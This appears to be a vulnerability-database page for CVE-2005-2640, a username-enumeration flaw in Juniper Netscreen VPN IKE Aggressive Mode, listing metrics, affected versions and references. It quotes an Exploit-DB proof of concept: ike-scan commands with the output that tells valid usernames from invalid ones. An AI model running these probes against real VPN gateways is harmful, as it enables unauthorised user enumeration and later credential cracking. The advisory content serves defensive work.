CVE-2005-2640

EPSS

3.07%V3

Vector

Network

Published

2005-08-20
02h00 +00:00

Modified

2016-10-17
11h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Behavioral discrepancy information leak in Juniper Netscreen VPN running ScreenOS 5.2.0 and earlier, when using IKE with pre-shared key authentication, allows remote attackers to enumerate valid usernames via an IKE Aggressive Mode packet, which generates a response if the username is valid but does not respond when the username is invalid.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:P/I:N/A:N	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 26168

Publication date : 2005-08-17 22h00 +00:00
Author : Roy Hills
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14595/info The Juniper Netscreen VPN implementation will identify valid usernames in IKE aggressive mode, when pre-shared key authentication is used. This allows for attackers to obtain a list of valid VPN users. With a valid username, an attacker can obtain hashed credentials against which a brute force attack may be performed. A successful crack would mean that the attacker has complete access to the network. The ike-scan options used in this example are: -A Specify IKE Aggressive Mode. The default for ike-scan is Main Mode. -M Multiline: Display each payload on a separate line, which makes the output easier to read. --id=string Specify the string to be used for the ID payload. 10.0.0.1 The IP address of the target Netscreen. 3.1. Response to valid username "royhills@hotmail.com" $ ike-scan -A -M --id=royhills@hotmail.com 10.0.0.1 Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/) 10.0.0.1 Aggressive Mode Handshake returned HDR=(CKY-R=21af4dbe2cecd5f0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=64405f46f03b7660a23be116a1975058e69e83870000000400000403 (Netscreen-05) VID=4865617274426561745f4e6f74696679386b0100 (Heartbeat Notify) KeyExchange(128 bytes) Nonce(20 bytes) ID(Type=ID_IPV4_ADDR, Value=10.0.0.1) Hash(20 bytes) Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1 returned handshake; 0 returned notify 3.2. Response to invalid username "invalid@hotmail.com" $ ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1 Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/) Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

Products Mentioned

Configuraton 0

Neoteris>>Instant_virtual_extranet >> Version 3.0

Neoteris>>Instant_virtual_extranet >> Version 3.1

Neoteris>>Instant_virtual_extranet >> Version 3.2

Neoteris>>Instant_virtual_extranet >> Version 3.3

Neoteris>>Instant_virtual_extranet >> Version 3.3.1

Configuraton 0

Juniper>>Netscreen_screenos >> Version 1.7

Juniper>>Netscreen_screenos >> Version 1.64

Juniper>>Netscreen_screenos >> Version 1.64 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 1.66

Juniper>>Netscreen_screenos >> Version 1.66 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 1.66_r2

Juniper>>Netscreen_screenos >> Version 1.73_r1

Juniper>>Netscreen_screenos >> Version 1.73_r2

Juniper>>Netscreen_screenos >> Version 2.0.1_r8

Juniper>>Netscreen_screenos >> Version 2.1

Juniper>>Netscreen_screenos >> Version 2.1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.1_r6

Juniper>>Netscreen_screenos >> Version 2.1_r7

Juniper>>Netscreen_screenos >> Version 2.5

Juniper>>Netscreen_screenos >> Version 2.5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.5r1

Juniper>>Netscreen_screenos >> Version 2.5r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.5r2

Juniper>>Netscreen_screenos >> Version 2.5r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.5r6

Juniper>>Netscreen_screenos >> Version 2.5r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.0

Juniper>>Netscreen_screenos >> Version 2.6.0 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1

Juniper>>Netscreen_screenos >> Version 2.6.1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r1

Juniper>>Netscreen_screenos >> Version 2.6.1r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r2

Juniper>>Netscreen_screenos >> Version 2.6.1r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r3

Juniper>>Netscreen_screenos >> Version 2.6.1r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r4

Juniper>>Netscreen_screenos >> Version 2.6.1r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r5

Juniper>>Netscreen_screenos >> Version 2.6.1r5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r6

Juniper>>Netscreen_screenos >> Version 2.6.1r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r7

Juniper>>Netscreen_screenos >> Version 2.6.1r7 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r8

Juniper>>Netscreen_screenos >> Version 2.6.1r8 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r9

Juniper>>Netscreen_screenos >> Version 2.6.1r9 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r10

Juniper>>Netscreen_screenos >> Version 2.6.1r10 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r11

Juniper>>Netscreen_screenos >> Version 2.6.1r11 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.6.1r12

Juniper>>Netscreen_screenos >> Version 2.6.1r12 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.7.1

Juniper>>Netscreen_screenos >> Version 2.7.1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.7.1r1

Juniper>>Netscreen_screenos >> Version 2.7.1r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.7.1r2

Juniper>>Netscreen_screenos >> Version 2.7.1r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.7.1r3

Juniper>>Netscreen_screenos >> Version 2.7.1r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.8

Juniper>>Netscreen_screenos >> Version 2.8 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 2.8_r1

Juniper>>Netscreen_screenos >> Version 2.10_r3

Juniper>>Netscreen_screenos >> Version 2.10_r4

Juniper>>Netscreen_screenos >> Version 3.0.0

Juniper>>Netscreen_screenos >> Version 3.0.0 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.0r1

Juniper>>Netscreen_screenos >> Version 3.0.0r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.0r2

Juniper>>Netscreen_screenos >> Version 3.0.0r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.0r3

Juniper>>Netscreen_screenos >> Version 3.0.0r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.0r4

Juniper>>Netscreen_screenos >> Version 3.0.0r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1

Juniper>>Netscreen_screenos >> Version 3.0.1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r1

Juniper>>Netscreen_screenos >> Version 3.0.1r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r2

Juniper>>Netscreen_screenos >> Version 3.0.1r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r3

Juniper>>Netscreen_screenos >> Version 3.0.1r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r4

Juniper>>Netscreen_screenos >> Version 3.0.1r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r5

Juniper>>Netscreen_screenos >> Version 3.0.1r5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r6

Juniper>>Netscreen_screenos >> Version 3.0.1r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.1r7

Juniper>>Netscreen_screenos >> Version 3.0.1r7 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.2

Juniper>>Netscreen_screenos >> Version 3.0.2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3

Juniper>>Netscreen_screenos >> Version 3.0.3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3_r1.1

Juniper>>Netscreen_screenos >> Version 3.0.3r1

Juniper>>Netscreen_screenos >> Version 3.0.3r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r2

Juniper>>Netscreen_screenos >> Version 3.0.3r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r3

Juniper>>Netscreen_screenos >> Version 3.0.3r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r4

Juniper>>Netscreen_screenos >> Version 3.0.3r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r5

Juniper>>Netscreen_screenos >> Version 3.0.3r5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r6

Juniper>>Netscreen_screenos >> Version 3.0.3r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r7

Juniper>>Netscreen_screenos >> Version 3.0.3r7 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.0.3r8

Juniper>>Netscreen_screenos >> Version 3.0.3r8 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0

Juniper>>Netscreen_screenos >> Version 3.1.0 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r1

Juniper>>Netscreen_screenos >> Version 3.1.0r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r2

Juniper>>Netscreen_screenos >> Version 3.1.0r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r3

Juniper>>Netscreen_screenos >> Version 3.1.0r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r4

Juniper>>Netscreen_screenos >> Version 3.1.0r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r5

Juniper>>Netscreen_screenos >> Version 3.1.0r5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r6

Juniper>>Netscreen_screenos >> Version 3.1.0r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r7

Juniper>>Netscreen_screenos >> Version 3.1.0r7 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r8

Juniper>>Netscreen_screenos >> Version 3.1.0r8 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r9

Juniper>>Netscreen_screenos >> Version 3.1.0r9 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r10

Juniper>>Netscreen_screenos >> Version 3.1.0r10 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r11

Juniper>>Netscreen_screenos >> Version 3.1.0r11 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.0r12

Juniper>>Netscreen_screenos >> Version 3.1.0r12 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 3.1.1_r2

Juniper>>Netscreen_screenos >> Version 4.0.0

Juniper>>Netscreen_screenos >> Version 4.0.0 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0

Juniper>>Netscreen_screenos >> Version 4.0.0r1

Juniper>>Netscreen_screenos >> Version 4.0.0r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r2

Juniper>>Netscreen_screenos >> Version 4.0.0r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r3

Juniper>>Netscreen_screenos >> Version 4.0.0r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r4

Juniper>>Netscreen_screenos >> Version 4.0.0r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r5

Juniper>>Netscreen_screenos >> Version 4.0.0r5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r6

Juniper>>Netscreen_screenos >> Version 4.0.0r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r7

Juniper>>Netscreen_screenos >> Version 4.0.0r7 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r8

Juniper>>Netscreen_screenos >> Version 4.0.0r8 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r9

Juniper>>Netscreen_screenos >> Version 4.0.0r9 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r10

Juniper>>Netscreen_screenos >> Version 4.0.0r10 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r11

Juniper>>Netscreen_screenos >> Version 4.0.0r11 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.0r12

Juniper>>Netscreen_screenos >> Version 4.0.0r12 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1

Juniper>>Netscreen_screenos >> Version 4.0.1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r1

Juniper>>Netscreen_screenos >> Version 4.0.1r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r2

Juniper>>Netscreen_screenos >> Version 4.0.1r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r3

Juniper>>Netscreen_screenos >> Version 4.0.1r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r4

Juniper>>Netscreen_screenos >> Version 4.0.1r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r5

Juniper>>Netscreen_screenos >> Version 4.0.1r5 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r6

Juniper>>Netscreen_screenos >> Version 4.0.1r6 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r7

Juniper>>Netscreen_screenos >> Version 4.0.1r7 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r8

Juniper>>Netscreen_screenos >> Version 4.0.1r8 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r9

Juniper>>Netscreen_screenos >> Version 4.0.1r9 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.1r10

Juniper>>Netscreen_screenos >> Version 4.0.1r10 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.2

Juniper>>Netscreen_screenos >> Version 4.0.2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.3

Juniper>>Netscreen_screenos >> Version 4.0.3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.3r1

Juniper>>Netscreen_screenos >> Version 4.0.3r1 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.3r2

Juniper>>Netscreen_screenos >> Version 4.0.3r2 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.3r3

Juniper>>Netscreen_screenos >> Version 4.0.3r3 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 4.0.3r4

Juniper>>Netscreen_screenos >> Version 4.0.3r4 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 5.0.0

Juniper>>Netscreen_screenos >> Version 5.0.0 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 5.1.0

Juniper>>Netscreen_screenos >> Version 5.1.0 (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 5.1.0r3a

Juniper>>Netscreen_screenos >> Version 5.1.0r3a (Open CPE detail)

Juniper>>Netscreen_screenos >> Version 5.2.0

Juniper>>Netscreen_screenos >> Version 5.2.0 (Open CPE detail)

Netscreen>>Ns-10 >> Version *

Netscreen>>Ns-100 >> Version 3.0_.pe1.0

Netscreen>>Ns-204 >> Version 5.0.0_r6.0

Netscreen>>Ns-204 >> Version 0110.0_11_4.0_r10.0

Netscreen>>Ns-204 >> Version 0110.0_11_5.1.0_r3a

Netscreen>>Ns-500 >> Version 4110.0_11_4.0_r10.0

Netscreen>>Ns-500 >> Version 4110.0_11_5.1.0_r3a

Netscreen>>Ns-50ns25 >> Version 5.0.0_r6.0

Configuraton 0

Juniper>>Netscreen-5gt >> Version 5.0

Juniper>>Netscreen-5gt >> Version 5.0 (Open CPE detail)

Juniper>>Netscreen-idp >> Version 3.0

Juniper>>Netscreen-idp >> Version 3.0 (Open CPE detail)

Juniper>>Netscreen-idp >> Version 3.0r1

Juniper>>Netscreen-idp >> Version 3.0r1 (Open CPE detail)

Juniper>>Netscreen-idp >> Version 3.0r2

Juniper>>Netscreen-idp >> Version 3.0r2 (Open CPE detail)

Juniper>>Netscreen-idp_10 >> Version 3.0.1_r1

Juniper>>Netscreen-idp_100 >> Version 3.0.1_r1

Juniper>>Netscreen-idp_1000 >> Version 3.0.1_r1

Juniper>>Netscreen-idp_500 >> Version 3.0.1_r1

Netscreen>>Netscreen-sa_5000_series >> Version *

Netscreen>>Netscreen-sa_5020_series >> Version 4.2_r2.2

Netscreen>>Netscreen-sa_5050_series >> Version 4.2_r2.2

References

http://www.securityfocus.com/bid/14595
Tags : vdb-entry, x_refsource_BID

http://marc.info/?l=bugtraq&m=112438068426034&w=2
Tags : mailing-list, x_refsource_BUGTRAQ

http://www.nta-monitor.com/news/vpn-flaws/juniper/netscreen/index.htm
Tags : x_refsource_MISC

http://securitytracker.com/id?1014728
Tags : vdb-entry, x_refsource_SECTRACK

http://secunia.com/advisories/16474/
Tags : third-party-advisory, x_refsource_SECUNIA

CVE-2005-2640 : Detail

CVE-2005-2640

CVE Descriptions

CVE Informations

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 26168

Products Mentioned

Configuraton 0

Configuraton 0

Configuraton 0

References